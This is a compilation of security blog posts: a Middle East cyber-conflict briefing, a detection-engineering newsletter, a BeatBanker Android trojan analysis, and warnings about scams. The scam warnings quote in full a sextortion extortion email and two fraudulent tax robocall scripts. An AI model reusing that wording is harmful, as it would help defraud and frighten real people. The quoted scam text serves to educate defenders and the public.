The reported physical impact to an AWS data center in the UAE reflects a significant escalation: commercial cloud infrastructure is no longer insulated from kinetic spillover. More recent reporting also indicates Iranian strikes targeting Microsoft Azure data infrastructure in the Gulf, expanding the threat profile to additional Western cloud platforms.

Iranian strikes against early-warning radars and satellite communication terminals across Gulf bases indicate a coordinated effort to degrade regional missile defense networks.

Enterprises should:

  • Confirm geographic redundancy for critical workloads.
  • Validate disaster recovery timelines (RTO/RPO) for Middle East–hosted environments.
  • Review third-party dependencies tied to regional data centers.
  • Ensure executive teams understand potential cascading impacts from localized physical disruption.
  • Organizations operating near or dependent on US or allied military infrastructure in the region should monitor potential disruptions to air defense coverage and communications networks.

4. ICS / OT Environments

Claims of intrusion into industrial control systems — including grain silo logistics and remote control infrastructure — signal elevated risk to operational technology environments. March 2 cyber reporting also emphasized blended risk: cyber operations paired with physical disruption, increasing the chance of cascading outages and degraded visibility during response.

Organizations operating ICS/SCADA systems, particularly in energy, logistics, water, and manufacturing sectors, should:

  • Audit all remote access pathways and eliminate unnecessary external exposure.
  • Enforce phishing-resistant MFA for privileged and engineering accounts.
  • Segment industrial networks from corporate IT and public internet access.
  • Validate incident response plans for destructive malware or system manipulation scenarios.
  • Conduct tabletop exercises assuming loss of visibility or control in critical systems.

What to Expect Next (48–72 Hours)

Flashpoint analysis indicates the conflict is entering a more decentralized phase characterized by hybrid warfare and expanding geographic scope.

Following the formal appointment of Mojtaba Khamenei as Supreme Leader, the Iranian state is expected to maintain a hardline military posture under strong IRGC influence. With conventional military capabilities increasingly degraded, Iranian strategy may rely more heavily on asymmetric tactics, including cyber operations, proxy mobilization, and attacks against economic and civilian infrastructure.

The fatwa issued by Grand Ayatollah Sistani introduces an additional destabilizing variable, potentially mobilizing Shiite militias across Iraq and the broader region. Combined with Kurdish mobilization along Iran’s western border and Azerbaijan’s heightened military posture in the north, the conflict may increasingly involve non-state and regional actors.

At the same time, cyber operations targeting Western defense, aviation, and infrastructure networks are likely to intensify as Iranian-linked actors attempt to expand the conflict’s impact beyond the immediate battlefield.

The activation of Iran’s decentralized “Mosaic Defense” protocol further complicates potential de-escalation. Because retaliatory authority is distributed across regional commanders, localized strike cycles may continue even if diplomatic negotiations emerge at higher political levels. This structure increases the likelihood of continued intermittent attacks across multiple theaters even as international pressure for conflict termination grows.

Ongoing Updates

Flashpoint will continue monitoring developments across physical, cyber, and geopolitical domains. Bookmark this page for updates as the situation evolves.

For organizations seeking deeper visibility into emerging threats, proxy activity, infrastructure targeting, and cross-domain escalation indicators, schedule a demo to see Flashpoint’s intelligence platform deliver timely, decision-ready intelligence.

See Flashpoint in Action

The post Escalation in the Middle East: Tracking “Operation Epic Fury” Across Military and Cyber Domains appeared first on Flashpoint.

  •  

Sextortion “I recorded you” emails reuse passwords found in disposable inboxes

Our malware removal support team recently flagged a new wave of sextortion emails, with the subject line: “You pervert, I recorded you!”

If the message sounds familiar, that’s because it’s a variation of the long-running “Hello pervert” scam.

The email claims the target’s device has been infected by a “drive-by exploit,” which supposedly gave the extortionist full access to the device. To add credibility, the scammer includes a password that actually belongs to the target.

Here’s one of the emails:

screenshot of sextortion email

Your device was compromised by my private malware. An outdated browser makes you vulnerable; simply visiting a malicious website containing my iframe can result in automatic infection.
For further information search for ‘Drive-by exploit’ on Google.
My malware has granted me full access to your accounts, complete control over your device, and the ability to monitor you via your camera.
If you believe this is a joke, no, I know your password: {an actual password}
I have collected all your private data and RECORDED FOOTAGE OF YOU MASTRUBATING THROUGH YOUR CAMERA!
To erase all traces, I have removed my malware.
If you doubt my seriousness, it takes only a few clicks to share your private video with friends, family, contacts, social networks, the darknet, or to publish your files.
You are the only one who can stop me, and I am here to help.
The only way to prevent further damage is to pay exactly $800 in Bitcoin (BTC).
This is a reasonable offer compared to the potential consequences of disclosure.
You can purchase Bitcoin (BTC) from reputable exchanges here:
{list of crypto-currency exchanges}
Once purchased, you can send the Bitcoin directly to my wallet address or use a wallet application such as Atomic Wallet or Exodus Wallet to manage your transactions.
My Bitcoin (BTC) wallet address is: {bitcoin wallet which has received 1 payment at the time of writing}
Copy and paste this address carefully, as it is case-sensitive.
You have 4 days to complete the payment.
Since I have access to this email account, I will be aware if this message has been read.
Upon receipt of the payment, I will remove all traces of my malware, and you can resume your normal life peacefully.
I keep my promises!

The message is a bit contradictory. Early on, the sender claims they have already removed the malware to “erase all traces,” but later promises to remove it after receiving payment.

Where the password comes from

I found that one particular sender using the name Jenny Green and the Gmail address JennyGreen64868@gmail.com sent many of these emails to people that use the FakeMailGenerator service.

FakeMailGenerator is a free disposable email service that gives users a temporary, receive‑only inbox they can use instead of their real address, mainly to get around email confirmations or avoid spam.

As mentioned, the addresses are receive‑only, meaning they cannot legitimately send mail and the mailbox is not tied to a specific person. On top of that, there is no login. Anyone who knows the address (or guesses the inbox URL) can see the same inbox.

My guess is that the scammer searched these public inboxes for passwords and then reused those passwords in their sextortion emails.

So users of FakeMailGenerator and similar services should consider this a warning. Your inbox may be publicly accessible, show up in search results, and you may receive a lot more than what you signed up for. Definitely don’t use services like this for anything sensitive.

How to stay safe

Knowing these scams exist is the first step to avoiding them. Sextortion emails rely on panic and embarrassment to push people into paying quickly. Here are a few simple steps to protect yourself:

  • Don’t rush. Scammers rely on fear and urgency. Take a moment to think before reacting.
  • Don’t reply to the email. Responding tells the attacker that someone is reading messages at that address, which may lead to more scams.
  • Change your password if it appears in the email. If you still use that password anywhere, update it.
  • Use a password manager. If you’re having trouble generating or storing a strong password, have a look at a password manager.
  • Don’t open unsolicited attachments. Especially when the sender address is suspicious or even your own.
  • Don’t use disposable inboxes for important accounts. The mail in that inbox might be available for anyone to find.
  • For peace of mind, turn your webcam off or buy a webcam cover so you can cover it when you’re not using the webcam.

Pro tip: Malwarebytes Scam Guard immediately recognized this for what it is: a sextortion scam.


What do cybercriminals know about you?

Use Malwarebytes’ free Digital Footprint scan to see whether your personal information has been exposed online.

  •  

Understanding GRC: How to Navigate Risks and Compliance Standards

“GRC” isn’t all witchcraft and administrative nonsense — it’s the core that drives security initiatives, connects security spend to business outcomes, and powers a well-functioning security team.

The post Understanding GRC: How to Navigate Risks and Compliance Standards appeared first on Black Hills Information Security, Inc..

  •  

Watch out for tax-season robocalls pushing fake “relief programs”

While Americans are sorting through paperwork to get their taxes filed in time, scammers are working overtime to grab a piece of the action.

As tax season ramps up, so does scam activity. Our telemetry shows a spike in robocalls impersonating tax resolution firms, tax relief agencies, and vaguely named “assistance centers.” These calls are designed to create urgency, fear, and confusion in the hope of pushing recipients to call back before they have time to think critically.

These robocalls typically try to collect personal information, pressure victims into paying fake tax debts, or funnel them into questionable tax-relief services.

Below are transcripts of two recent voicemail examples submitted by anonymized Scam Guard users that illustrate how these scams operate.

The scripts: different names, similar playbook

Voicemail #1

“Hi, this is <REDACTED_NAME> calling on March 3rd from the eligibility support and review division at the tax resolution assistance center.  I’m contacting you because your account remains under active confirmation review.  There is still an opportunity to verify your standing while this evaluation period remains open.  To make this simple, we provide a direct proprietary verification line with no weight, allowing immediate access to clear and accurate information.  This verification step is brief and focused strictly on determining current eligibility and available options.  Please call back at 888-919-9743.  Again, 888-919-9743.  If this message reached you in error, please call back and press 3 to be removed”

Characteristics:

  • Claims to be from an “eligibility support and review division at the tax resolution assistance center.”
  • Says your “account remains under active confirmation review.”
  • Offers a “direct proprietary verification line.”
  • Urges quick action while the “evaluation period remains open.”
  • Provides a callback number and an opt-out option.

Voicemail #2

“Hi, this is <REDACTED_NAME> with professional tax associates. Today is Tuesday March 3rd. I’m calling to follow up on back taxes and missed filings. This may be our only attempt to reach you, and due to new resolution programs that are available for a limited time, we highly recommend you give us a call today. This will be your best opportunity to get a fresh start before it becomes a bigger and permanent issue. Please call us back today at 8338204216 again 8338204216. If you’ve already resolved this issue. You may disregard this message or call back using the number on your caller ID to opt out. Thank you. If you were reached in error or wish to stop future outreach, please press 8 now and you will be removed from future outreach. Thank you and we look forward to assisting you. “

Characteristics:

  • Claims to be with “professional tax associates.”
  • References “back taxes and missed filings.”
  • Warns this “may be our only attempt to reach you.”
  • Mentions “new resolution programs available for a limited time.”
  • Provides a callback number and opt-out instructions.

What these robocalls have in common

While the wording differs slightly, the structure and psychological tactics are nearly identical.

Both messages use generic but authoritative language:

  • “Eligibility support and review division”
  • “Tax resolution assistance center”
  • “Professional tax associates”

These names sound legitimate but don’t identify a specific, verifiable company. Scammers often rely on institutional-sounding phrases to create credibility without providing any real details.

Both messages also reference vague “account” problems, but neither voicemail mentions:

  • Your name
  • A specific tax year
  • A case number
  • A known agency like the IRS

Instead, they reference:

  • “Active confirmation review”
  • “Back taxes and missed filings”
  • “Eligibility and available options”

This vagueness is intentional. It allows the same robocall script to target thousands of people, regardless of their actual tax situation.

What you will always see with scams is urgency. Both calls attempt to rush the recipient into action:

  • “There is still an opportunity… while this evaluation period remains open.”
  • “This may be our only attempt to reach you.”
  • “Limited time resolution programs.”
  • “Call today.”

Creating urgency reduces the likelihood that someone will pause, research the number, or consult a trusted source.

The second voicemail includes the promise of a “fresh start before it becomes a bigger and permanent issue.” This is a common emotional hook, blending fear (a permanent problem) with hope (a fresh start), which can encourage impulsive callbacks.

Both messages push recipients to call a direct number rather than referencing an official website or established contact method. Legitimate tax agencies, including the IRS, do not initiate contact through unsolicited robocalls asking you to call back immediately.

Both scripts include instructions like:

  • “Press 3 to be removed.”
  • “Press 8 now and you will be removed.”
  • “Call back using the number on your caller ID to opt out.”

These opt-out options create an illusion of compliance and legitimacy. In reality, pressing numbers or calling back can confirm that your phone number is active, which may lead to more scam calls.

How to stay safe

Knowing how to identify scam calls is an important step. So, here are some key red flags to watch for:

  • No personalization
  • Vague agency names
  • Pressure to act immediately
  • Threat of missed opportunity
  • Promises of relief without verification
  • Instructions to call back a random 800/833/888 number
  • Robotic or heavily scripted tone

If a message checks at least one of these boxes, it is very likely not legitimate.

  • Before calling a number, verify it by visiting the official site directly.
  • Beware of unsolicited phone calls or emails, especially those that ask you to act immediately. Government agencies will not call out of the blue to demand sensitive personal or financial information.
  • Never provide sensitive personal information such as your bank account, charge card, or Social Security number over unverified channels. Instead use a secure method such as your online account or another application on IRS.gov.
  • Report scams to the IRS to help others.

We don’t just report on threats—we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your, and your family’s, personal information by using identity protection.

  •  

Navigating 2026’s Converged Threats: Insights from Flashpoint’s Global Threat Intelligence Report

Blogs

Blog

Navigating 2026’s Converged Threats: Insights from Flashpoint’s Global Threat Intelligence Report

In this post, we preview the critical findings of the 2026 Global Threat Intelligence Report, highlighting how the collapse of traditional security silos and the rise of autonomous, machine-speed attacks are forcing a total reimagining of modern defense.

SHARE THIS:
Default Author Image
March 11, 2026

The cybersecurity landscape has reached a point of total convergence, where the silos that once separated malware, identity, and infrastructure have collapsed into a single, high-velocity threat engine. Simultaneously, the threat landscape is shifting from human-led attacks to machine-speed operations as a result of agentic AI, which acts as a force multiplier for the modern adversary.

Flashpoint’s 2026 Global Threat Intelligence Report

Flashpoint’s 2026 Global Threat Intelligence Report (GTIR) was developed to anchor security leaders — from threat intelligence and vulnerability management teams to physical security professionals and the CISO’s office — with the data required to navigate this year’s greatest threats, rife with infostealers, vulnerabilities, ransomware, and malicious insiders.

Our report uncovers several staggering metrics that illustrate the industrialization of modern cybercrime:

  • AI-related illicit activity skyrocketed by 1,500% in a single month at the end of 2025.
  • 3.3 billion compromised credentials and cloud tokens have turned identity into the primary exploit vector.
  • From January 2025 to December 2025, ransomware incidents rose by 53%, as attackers pivot from technical encryption to “pure-play” identity extortion.
  • Vulnerability disclosures surged by 12% from January 2025 to December 2025, with the window between discovery and mass exploitation effectively vanishing.

These findings are derived from Flashpoint’s Primary Source Collection (PSC), a specialized operating model that collects intelligence directly from original sources, driven by an organization’s unique Priority Intelligence Requirements (PIR). The 2026 Global Threat Intelligence Report leverages this ground-truth data to provide a strategic framework for the year ahead. Download to gain:

  1. A Clear Understanding of the New Convergence Between Identity and AI
    Discover how threat actors are preparing to transition from generative tools to sophisticated agentic frameworks. Learn how 3.3 billion compromised credentials are being weaponized via automated orchestration to bypass legacy defenses and exploit the connective tissue of modern corporate APIs.
  2. Intelligence on the “Franchise Model” of Global Extortion
    Gain deep insight into the professionalized operations of today’s most prolific threat actors. From the industrial efficiency of RaaS groups like RansomHub and Clop to the market dominance of the next generation of infostealer malware, we break down the economics driving today’s cybercrime ecosystem.
  3. A Blueprint for Proactive Defense and Risk Mitigation
    Leverage the latest trends, in-depth analysis, and data-driven insights driven by Primary Source Collection to bolster your security posture by identifying and proactively defending against rising attack vectors.

As attackers automate exploitation of identity, vulnerabilities, and ransomware, defenders who rely on fragmented visibility will fall behind. To keep pace, organizations must ground their decisions in primary-source intelligence that is drawn from adversarial environments, so that decision-makers can get ahead of this accelerating threat cycle.”

Josh Lefkowitz, CEO & Co-Founder at Flashpoint

The Top Threats at a Glance

Our latest report identifies four driving themes shaping the 2026 threat landscape:

2026 Is the Era of Agentic-Based Cyberattacks

Flashpoint identified a 1,500% rise in AI-related illicit discussions between November and December 2025, signaling a rapid transition from criminal curiosity to the active development of malicious frameworks. Built on data pulled from criminal environments and shaped by fraud use cases, these systems scrape data, adjust messaging for specific targets, rotate infrastructure, and learn from failed attempts without the need for constant human involvement.

2026 is the era of agentic-based cyberattacks. We’ve seen a 1,500% increase in AI-related illicit discussions in a single month, signaling increased interest in developing malicious frameworks. The discussions evolve into vibe-coded, AI-supported phishing lures, malware, and cybercrime venues. When iteration becomes cheap through automation, attackers can afford to fail repeatedly until they find a successful foothold.

Ian Gray, Vice President of Cyber Threat Intelligence Operations at Flashpoint

Identity Is the New Exploit

Flashpoint observed over 11.1 million machines infected with infostealers in 2025, fueling a massive inventory of 3.3 billion stolen credentials and cloud tokens. The fundamental mechanics of cybercrime have shifted from breaking in to logging in, as attackers leverage stolen session cookies to behave like legitimate users.

The Patching Window Is Rapidly Closing

Vulnerability disclosures surged by 12% in 2025, with 1 in 3 (33%) vulnerabilities having publicly available exploit code. The strategic gap between discovery and weaponization is increasingly vanishing, as evidenced by mass exploitation of zero-day vulnerabilities in as little as 24 hours after discovery.

Ransomware Is Hacking the Person, Not the Code

As technical defenses against encryption harden, ransomware groups are pivoting to the path of least resistance: human trust. This approach has led to a 53% increase in ransomware, with RaaS groups being responsible for over 87% of all ransomware attacks.

Build Resilience in a Converged Landscape

The findings in the 2026 Global Threat Intelligence Report make one thing clear: incremental improvements to legacy security models are no longer sufficient. As adversaries transition to machine-speed operations, the strategic advantage shifts to organizations that can maintain visibility into the adversarial environments where these attacks are born.

Protecting organizations and communities requires an intelligence-first approach. Download Flashpoint’s 2026 Global Threat Intelligence Report to gain clarity and the data-driven insights needed to safeguard critical assets.

Get Your Copy

The post Navigating 2026’s Converged Threats: Insights from Flashpoint’s Global Threat Intelligence Report appeared first on Flashpoint.

  •  

DEW #148 - Detection Pipeline Maturity, GenUI for Log Analysis and Hunting Kali in Splunk

Welcome to Issue #148 of Detection Engineering Weekly!

✍️ Musings from the life of Zack:

  • I have some exciting news! In about a week, you’ll see some new branding for Detection Engineering Weekly. This will be the second brand uplift of the newsletter, and I can’t wait to don the new colors and logo. It’s more professional and understated, and it captures much of the energy of what I think this newsletter brings to your inboxes. I’ll be handing out stickers and potentially some t-shirts at BSidesSF in a few weeks!

  • Speaking of BSidesSF, I’m interested in how many of you are going to be there. I am organizing a happy hour and doing a sticker order, so please vote Yes here, ping me, or honestly just find me in the hallway (I’ll be shilling the newsletter with tshirts) and say hello!

Sponsor: Spectrum Security

Detection is Broken.

Measuring coverage means wrangling spreadsheets, BAS tools, and weeks of manual work. By the time you finish, the data is out of date.

But finding blind spots is only half the battle. There’s never enough time to close them. You’re on an endless treadmill: writing new rules, fixing broken ones, and tuning out noise.

We built the end of the manual grind.

Get an early look at the AI platform transforming how teams identify, build, & deploy detections

Try It Now


Every week, I read, watch and listen to all the Detection Engineering content so you can consume it all in 10 minutes. Subscribe and get a weekly digest of the latest and greatest in threat detection engineering!

💎 Detection Engineering Gem 💎

Detection Pipeline Maturity Model by Scott Plastine

I’m a huge fan of maturity models, and in the early days of my writing, I frequently referenced the work of Haider Dost and Kyle Bailey when discussing the maturity of detection engineering programs. As this space matured, technology matured with it, and we now have complex systems within each part of the Detection Engineering Lifecycle. So, to me, it makes sense that we now have folks like Plastine helping us understand what it means to measure the maturity of a Detection Pipeline.

Plastine outlines six different levels of maturity, starting with a classic favorite, no maturity! This involves having a security tool stack with no centralization, and analysts have dozens to hundreds of Google Chrome tabs open which gives me anxiety. The fundamental issues Plastine outlines and continues to improve here include:

  • Several security tools with their own alerting and detection systems

  • The need to log into and investigate each alert on each individual tool, so managing screen sprawl

  • The analyst manually building cases in some case management or ticketing tool, such as JIRA or ServiceNow

The next maturity step, Basic, addresses some of these issues by essentially placing the Case Management tool between the tools and the analyst, rather than being out of band. As maturity levels progress, so does the architecture of this setup. For example, the “Standard+” architecture has a much saner pipeline setup:

The cool part at this point in the maturity journey is switching from architecture improvements to more advanced concepts in the analytics platform. Custom telemetry, log normalization, and a risk-based alerting engine ideally surface only relevant alerts and reduce false positives. Teams begin to build composite rules, leveraging commercial detections alongside their own internal detection and risk alerting systems, and they all take advantage of learning from their data to inform their rule sets, not just their environment.

This diagram drove it home for me, and became my favorite:

As you progress through maturity, the trap teams fall into is more rules is better. I think the measure of a Leading detection function is reducing rule count thereby reducing the complexity of managing rule sprawl.

Plastine posits that this can be achieved by using data-science-based rules, risk-based detection, and leveraging as much entity-based correlation as possible.


🔬 State of the Art

Whose endpoint is this… kali?! by Alex Teixeira

I love reading Alex’s detection and hunting blogs because he always stuffs a ton of knowledge around query optimization and hunting. When you manage massive amounts of data in a SIEM, especially Splunk, you need to query it in a way that doesn’t cause a ton of load on the system. This is especially helpful when you are researching new detection rules.

In this post, Alex addresses query optimization and discovery for post-exploitation tools. I typically see a lot of teams worry, for good reason, about malware that is the beginning stages of a breach. Alex references loaders in this scenario: malware designed as an initial beachhead for infection, which is then upgraded into a more reliable malware tool. Cobalt Strike is a leading example, but there are hundreds at this point.

Post-exploitation tools are aptly named to help threat actors navigate the MITRE ATT&CK chain toward a specific objective, such as data exfiltration or ransomware. Persistence, lateral movement, and privilege escalation are all built-in to these types of tools. So if you assume these exist, how do you catch them?

From Alex’s Prioritizing a Detection Backlog post https://detect.fyi/how-to-prioritize-a-detection-backlog-84a16d4cc7ae

His strategy is to “reduce the dataset” as you are hunting. Instead of performing blind searches over logs, you can first focus on terms within the index and the Windows sourcetype itself. So, he begins his hunt looking for the term kali in Windows Event Logs. This is because these tools can leak their internal hostnames, and finding kali in the hostname with some threat activity is a great hunting lead.

Through a combination of hostname detection and observing a network event with the same name, he narrows the dataset to a meaningful set of events to respond to an infection and write rules for afterward.


Tracking DPRK operator IPs over time by Kieran Miyamoto

Threat research is such a fun, dynamic field within security because it examines both the technical and human elements of threat actors. This post is Miyamoto's “Part 3” on tracking DPRK threat actors via OPSEC failures, and it’s brilliant in its simplicity. Basically, FAMOUS CHOLLIMA, which has Contagious Interview and some WageMole overlaps, uses email to maintain its personas, register accounts, and issue fake employment-scam communications. The technical elements of this are interesting because they try to deploy malware on victim machines or obtain legitimate jobs as fake IT workers.

The human element of this operation is that humans tend to optimize for reducing the time it takes to do their job as efficiently as possible. So, why would you go through a ton of work to get legitimate email inboxes like Gmail or Yahoo if you only need the email address to send scam messages or register an npm account to publish malware? Miyamoto found that this group had the same question, and answered it by using temporary email addresses.

The subsequent finding is that, as long as you know the email address, you can also view the inbox! Miyamoto started with malicious npm packages containing maintainer emails and began logging into DPRK-controlled temporary email accounts to glean additional intelligence, including source IP addresses and potential victim targets.


From GenAI to GenUI: Why Your AI CTI Agent Is Sh*T by Thomas Roccia

TIL there’s a concept called Generative UI, where agents decide how to render the UI in real time based on your queries. In this post, Roccia uses this concept to build out use cases for cyber threat intelligence analysis. The idea here is that visually representing threat intelligence can help a researcher understand the underlying data much better than blobs of text. Roccia argues that most CTI Agents focus on ingesting unstructured threat intelligence and producing large volumes of output tailored to your environment or prompt. This setup can be helpful to some, but adding a visual component to aid your understanding makes it more attractive.

Roccia outlines two GenUI styles: MCPUI and A2UI. Both focus on delivering a graphical representation of a prompt response. MCPUI returns dynamic elements from an MCP server in response to a prompt, but it’s mostly contained within a UI that the developer creates. A2UI takes it a step further by delivering the entire UI experience in a container, making the agent the arbiter of the experience.

Roccia’s A2UI implementation was more interesting to me from a detection standpoint because he built a log analyzer on top of a log stream. Each element is supposedly dynamic, and you can click into and investigate logs while allowing the A2UI protocol do its thing and present data and experiences to you, all driven by an agent. Here’s a demo video from his blog:

Wild times!


How we built high speed threat hunting for email security by Hugh Oh

I love it when security product companies show how they’ve engineered their product. In this post, Oh reveals how Sublime Security designed its massive email-detection and threat-hunting architecture. Their platform is built on MQL, their domain-specific language for rule writing and alerting. When you think about email as a telemetry source, there are some inherent issues you have to worry about unlike other sources:

  • Unstructured body content, since, by design, it is human-generated and human-readable

  • In Internet standards, email is a pretty ancient concept, so additional designs and RFCs were layered on top of it for decades, which can introduce some sharp edges

  • Attachments, integrations and user-experience elements are a huge vector for abuse, so you need to be able to parse those

This is a security and engineering problem to parse at scale.

https://sublime.security/blog/how-we-built-high-speed-threat-hunting-for-email-security/

The Sublime product parses incoming emails into EML format and stores metadata in fast storage and the full contents in blob storage. They split email selection into several phases. Candidate selection focuses on fast metadata lookups; evaluation performs a deeper analysis to determine whether these candidates are truly worth a blob storage query; and, when the full email is retrieved, they can perform enrichments and ultimately decide whether to generate a result.


A Practical Blue Team Project: SSH Log Analysis with Python by Edson Encinas

This is a great introductory post on researching a singular log source, SSH authentication logs, and building a research plan to implement detection rules. I think sometimes people breaking into this industry want to jump right into a SIEM and write rules, which can take time, energy, and potentially cost a lot to set up, whereas in this post, Encinas leveraged Python. It’s a good learning exercise: you can see where Python excels at detection, especially in a risk-based alerting scenario.

The architecture for the SSH alerting pipeline includes parsing, normalization, rule writing, risk calculation, and de-duplication. Their GitHub project was pretty easy to follow alongside the blog. Again, demonstrating these concepts in pure Python can accelerate understanding more than setting up massive environments.


☣️ Threat Landscape

I’m glad to see more individual interviews from Ryan on the Three Buddy Problem podcast! In this “Security Conversations” segment, Ryan interviews threat-hunting and intelligence expert Greg Linares. Greg has all kinds of visibility working at an MDR and recently released a year-in-review report on some of the intrusions Huntress is seeing.

The most interesting sections for me were around the intersection of ransomware and nation-state threat actors, as well as the use of RMM tools and the complete lack of audit logging and visibility they provide defenders. Imagine onboarding any other critical IT tool, such as an Enterprise Email provider or a Cloud tool, and being told there will be little to no telemetry available to help you defend the application against a compromise. That’s RMM in a nutshell!


Investigating Suspected DPRK-Linked Crypto Intrusions by CTRL-Alt-Intel

I talk a lot about DPRK-related threat activity in this newsletter for several reasons. One, DPRK tends to focus on cloud technologies, and IMHO, they were way ahead of their other nation-state peers. Two, they are just so damn crafty and are willing to move fast and break things. Third, because of point two, they have a ton of OPSEC failures that lead to some hilarious findings

In this post, CTRL-Alt-Intel follows an intrusion by a DPRK actor who began with an Application exploit a la React2Shell, found AWS credentials, pivoted to AWS, and ultimately stole source code. The author says this focus was mostly on cryptocurrency companies, so if we believe this intrusion targeted one of those organizations, then the intelligence value for them would be discovering secrets and vulnerabilities in proprietary code for further attacks.


Uncovering agent logging gaps in Copilot Studio by Katie Knowles

~ Note, Datadog is my employer and Katie is my colleague / friend! ~

Microsoft Copilot Studio is Microsoft’s offering for creating and managing AI agents. During Katie’s previous research on how to abuse Copilot Studio for OAuth phishing, she found that Copilot wasn’t logging certain administrative actions. This is especially concerning if you rely on audit logs for threat detection. A victim agent could be abused to retrieve sensitive information from your organization and you’d have no visibility into the attack itself.

Katie provides excellent security recommendations towards the end, including identifying which M365 users are using Copilot, and what searches and rules you could write to detect anomalous activity in Copilot.


This was a fun read for those who are interested in phishing-related threat research. Ceukelaire got a phishing text message, accessed the phishing page, and began poking holes in it. He found a vulnerability where he set the X-Forwarded-For header to a localhost address (Substack won’t let me publish it?) and it was an auto bypass of the administrator login panel.

From there, he started rendering the kit useless by removing its functionality and its ability to communicate with a Telegram-controlled channel. He was able to stop victim exfiltration and prevent further victims from visiting the website. Luckily, it was a poorly designed phishing kit, riddled with vulnerabilities, but not all kits are this insecure.


Clearing the Water: Unmasking an Attack Chain of MuddyWater by Harlan Carvey and Jamie Levy

In this post, Huntress researchers Carvey and Levy detailed findings related to what appears to be a hands-on-keyboard MuddyWater campaign targeting one of their customers. They first found intelligence from a Hunt.io report and worked backwards into their own customer reports. Some interesting findings they made include:

  • Typos in the terminal commands MuddyWater ran, indicating an actor who was typing in real time during the intrusion

  • Tradecraft learnings, such as opening PowerShell from the Explorer, making it seem like a more legitimate activity than running it from the commandline

  • Troubleshooting in real-time by cURLing ifconfig.me to make sure they have Internet connectivity

It turns out that threat actors make mistakes too!


🔗 Open Source

killvxk/awesome-C2

Yet another awesome-* list of 300+ Command and Control frameworks. This is a fun list if you want to test adversary simulation in a lab environment, or statically analyze the post-exploitation code for detection opportunities.


edsonencinas/log-analyzer

Encina’s pure Python “SIEM” used in his SSH log analyzer blog post listed above in the State of the Art section. What’s nice about this is it reduces the complexity of standing up an environment, and instead you can focus on the concepts of detection in a contained programming language.


github/spec-kit

Not really detection related, but this was something my colleague Matt Muller sent me as I was vibecoding out a fully STIXv2 compliant Threat Intelligence Platform. Spec Kit is a framework for spec-driven development using agents. You create a constitution that sets guidelines for development principles. You then specify what you want to build, how you want to plan to build it with certain technologies, build a task list and then have the agent go to work.

I kept my speckit separate from my code, so my agent would read and update my local spec and then go into the target project directory for development.


m1k1o/neko

Self-hosted virtual browser using containers and WebRTC. These technologies are always super interesting from an OPSEC perspective, because you can literally embed a browser in a website that you host that also hosts neko. This makes it easy to make non-attributable and disposable infrastructure for things like threat intelligence research or for interacting with threat actor infrastructure.


anotherhadi/default-creds

Open-source database of default credentials across 100s of manufacturers. You can download this and take the credentials yourself, or run their self-contained web application, or just visit the hosted web application and find some hilarious default creds.

Every week, I read, watch and listen to all the Detection Engineering content so you can consume it all in 10 minutes. Subscribe and get a weekly digest of the latest and greatest in threat detection engineering!

  •  

Augmented Phishing: Social Engineering in the Age of AI

The rise of GenAI has pushed social engineering and phishing to new levels. What once required manual effort can now be generated in seconds, resulting in hyper-personalized messages, cloned executive voices, and even realistic video impersonations. Deepfake incidents have already moved from online curiosity to real business risk, driving financial loss and operational disruption in organizations worldwide.  On everyday collaboration platforms, verifying identity has become increasingly difficult. Real-time face and voice cloning remove many traditional warning signs, making scams harder to spot than ever. As the threat landscape shifts, organizations need modern defenses and smarter awareness programs designed for the realities of the AI era.  Check Point Services has recently expanded its training portfolio to help […]

The post Augmented Phishing: Social Engineering in the Age of AI appeared first on Check Point Blog.

  •  

BeatBanker and BTMOB trojans: infection techniques and how to stay safe | Kaspersky official blog

To achieve their malign aims, Android malware developers have to address several challenges in a row: trick users to get inside their smartphones, dodge security software, talk victims into granting various system permissions, keep away from built-in battery optimizers that kill resource hogs, and, after all that, make sure their malware actually turns a profit. The creators of the BeatBanker — an Android‑based malware campaign recently discovered by our experts — have come up with something new for each one of these steps. The attack is (for now) aimed at Brazilian users, but the developers’ ambitions will almost certainly push them toward international expansion, so it’s worth staying on guard and studying the threat actor’s tricks. You can find a full technical analysis of the malware on Securelist.

How BeatBanker infiltrates a smartphone

The malware is distributed through specially crafted phishing pages that mimic the Google Play Store. A page that’s easily mistaken for the official app marketplace invites users to download a seemingly useful app. In one campaign, the trojan disguised itself as the Brazilian government services app, INSS Reembolso; in another, it posed as the Starlink app.

The malicious site cupomgratisfood{.}shop does an excellent job imitating an app store. It's just unclear why the fake INSS Reembolso appears all of three times. To be extra sure, perhaps?!

The malicious site cupomgratisfood{.}shop does an excellent job imitating an app store. It’s just unclear why the fake INSS Reembolso appears all of three times. To be extra sure, perhaps?!

The installation takes place in several stages to avoid requesting too many permissions at once and to further lull the victim’s vigilance. After the first app is downloaded and launched, it displays an interface that also resembles Google Play and simulates an update for the decoy app — requesting the user’s permission to install apps, which doesn’t look out-of-the-ordinary in context. If you grant this permission, the malware downloads additional malicious modules to your smartphone.

After installation, the trojan simulates a decoy app update via Google Play by requesting permission to install applications while downloading additional malicious modules in the process

After installation, the trojan simulates a decoy app update via Google Play by requesting permission to install applications while downloading additional malicious modules in the process

All components of the trojan are encrypted. Before decrypting and proceeding to the next stages of infection, it checks to ensure it’s on a real smartphone and in the target country. BeatBanker immediately terminates its own process if it finds any discrepancies or detects that it’s running in emulated or analysis environments. This complicates dynamic analysis of the malware. Incidentally, the fake update downloader injects modules directly into RAM to avoid creating files on the smartphone that would be visible to security software.

All these tricks are nothing new and frequently used in complex malware for desktop computers. However, for smartphones, such sophistication is still a rarity, and not every security tool will spot it. Users of Kaspersky products are protected from this threat.

Playing audio as a shield

Once established on the smartphone, BeatBanker downloads a module for mining Monero cryptocurrency. The authors were very concerned that the smartphone’s aggressive battery optimization systems might shut down the miner, so they came up with a trick: playing an all-but-inaudible sound at all times. Power consumption control systems typically spare apps that are playing audio or video to avoid cutting off background music or podcast players. In this way, the malware can run continuously. Additionally, it displays a persistent notification in the status bar, asking the user to keep the phone on for a system update.

Example of a persistent system update notification from another malicious app masquerading as the Starlink app

Example of a persistent system update notification from another malicious app masquerading as the Starlink app

Control via Google

To manage the trojan, the authors leverage Google’s legitimate Firebase Cloud Messaging (FCM) — a system for receiving notifications and sending data from a smartphone. This feature is available to all apps and it’s the most popular method for sending and receiving data. Thanks to FCM, attackers can monitor the device’s status and change its settings as needed.

Nothing bad happens for a while after the malware is installed: the attackers wait it out. Then they trigger the miner, but they’re careful to throttle it back if the phone overheats, the battery starts dipping, or the owner happens to be using the device. All of this is handled via FCM.

